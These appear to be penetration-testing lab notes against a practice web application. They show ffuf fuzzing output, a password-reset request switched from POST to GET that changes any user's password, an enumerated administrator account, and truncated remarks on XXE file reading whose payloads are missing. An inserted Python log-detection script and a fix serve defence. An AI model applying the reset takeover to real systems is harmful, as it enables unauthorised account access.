ffuf -u http://83.136.249.223:31795/FUZZ -w Downloads/SecLists/Discovery/Web-Content/raft-large-directories.txt
images [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 13ms]
server-status [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 9ms]
ffuf -u http://83.136.249.223:31795/FUZZ -w Downloads/SecLists/Discovery/Web-Content/raft-large-files.txt
index.php [Status: 200, Size: 2386, Words: 418, Lines: 56, Duration: 13ms]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 10ms]
.htaccess [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 10ms]
style.css [Status: 200, Size: 4325, Words: 480, Lines: 247, Duration: 11ms]
api.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 12ms]
. [Status: 200, Size: 2386, Words: 418, Lines: 56, Duration: 13ms]
settings.php [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 12ms]
.html [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 12ms]
.php [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 10ms]
.htpasswd [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 10ms]
.htm [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 10ms]
.htpasswds [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 9ms]
profile.php [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1180ms]
event.php [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 19ms]
reset.php [Status: 200, Size: 18, Words: 2, Lines: 1, Duration: 13ms]
.htgroup [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 12ms]
wp-forum.phps [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 9ms]
.htaccess.bak [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 11ms]
.htuser [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 10ms]
.ht [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 11ms]
.htc [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 11ms]
.htacess [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 11ms]
.htaccess.old [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 11ms]
addEvent.php [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 10ms]
:: Progress: [37050/37050] :: Job [1/1] :: 3448 req/sec :: Duration: [0:00:13] :: Errors: 0 ::
Any user's password can be changed by switching the POST to a GET; the parameters also have to be moved so they are passed as GET parameters:
GET /reset.php?uid=75&password=Academy_student!&token=e51a8a3c-17ac-11ec-8e68-7fe51c0c175e
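Added detection example, not part of these notes: a Python script that runs over constructed Apache access-log lines and flags the two behaviours above, a client sending uid/password/token to reset.php in a GET query string, and a client racking up 403s on the dotfile paths that the wordlist run hits. The log lines, client IPs and the 403 threshold are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (hypothetical sample, not from the target above).
SAMPLE_LOG = """\
10.0.0.5 - - [20/Sep/2021:10:00:01 +0000] "GET /.htaccess HTTP/1.1" 403 282 "-" "scanner"
10.0.0.5 - - [20/Sep/2021:10:00:01 +0000] "GET /.htpasswd HTTP/1.1" 403 282 "-" "scanner"
10.0.0.5 - - [20/Sep/2021:10:00:01 +0000] "GET /.htgroup HTTP/1.1" 403 282 "-" "scanner"
10.0.0.5 - - [20/Sep/2021:10:00:02 +0000] "GET /server-status HTTP/1.1" 403 282 "-" "scanner"
10.0.0.5 - - [20/Sep/2021:10:00:09 +0000] "GET /reset.php?uid=75&password=Academy_student!&token=e51a8a3c-17ac-11ec-8e68-7fe51c0c175e HTTP/1.1" 200 18 "-" "scanner"
10.0.0.9 - - [20/Sep/2021:10:00:10 +0000] "POST /reset.php HTTP/1.1" 200 18 "-" "browser"
10.0.0.9 - - [20/Sep/2021:10:00:11 +0000] "GET /index.php HTTP/1.1" 200 2386 "-" "browser"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)
# Parameter names that should never travel in a URL: they end up in access logs,
# proxies and browser history, and here they let the reset endpoint be driven by GET.
SENSITIVE_PARAMS = {"password", "passwd", "pass", "token"}

def parse_log(text):
    """Yield one dict per line that matches the combined log format; other lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["status"] = int(entry["status"])
            yield entry

def credentials_in_query(entries):
    """Return (ip, path, sensitive keys) for GET requests that carry credentials in the query string."""
    hits = []
    for e in entries:
        if e["method"] != "GET":
            continue
        url = urlsplit(e["target"])
        keys = sorted(set(parse_qs(url.query)) & SENSITIVE_PARAMS)
        if keys:
            hits.append((e["ip"], url.path, keys))
    return hits

def forbidden_bursts(entries, threshold=3):
    """Return {ip: count} for clients with at least `threshold` 403 responses (dotfile/wordlist probing)."""
    counts = Counter(e["ip"] for e in entries if e["status"] == 403)
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    entries = list(parse_log(SAMPLE_LOG))
    print(credentials_in_query(entries))  # [('10.0.0.5', '/reset.php', ['password', 'token'])]
    print(forbidden_bursts(entries))      # {'10.0.0.5': 4}
```

The server-side fix for the first finding is to reject anything but POST on reset.php and to bind the token to the requesting user's session rather than trusting a uid parameter.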
Enumerating the users turns up:
{'uid': '52', 'username': 'a.corrales', 'full_name': 'Amor Corrales', 'company': 'Administrator'}
Events can then be created, and there is an XXE:

The XXE is triggered with:

The XXE requests appear to be blocked.
But reading PHP files works when the output is encoded: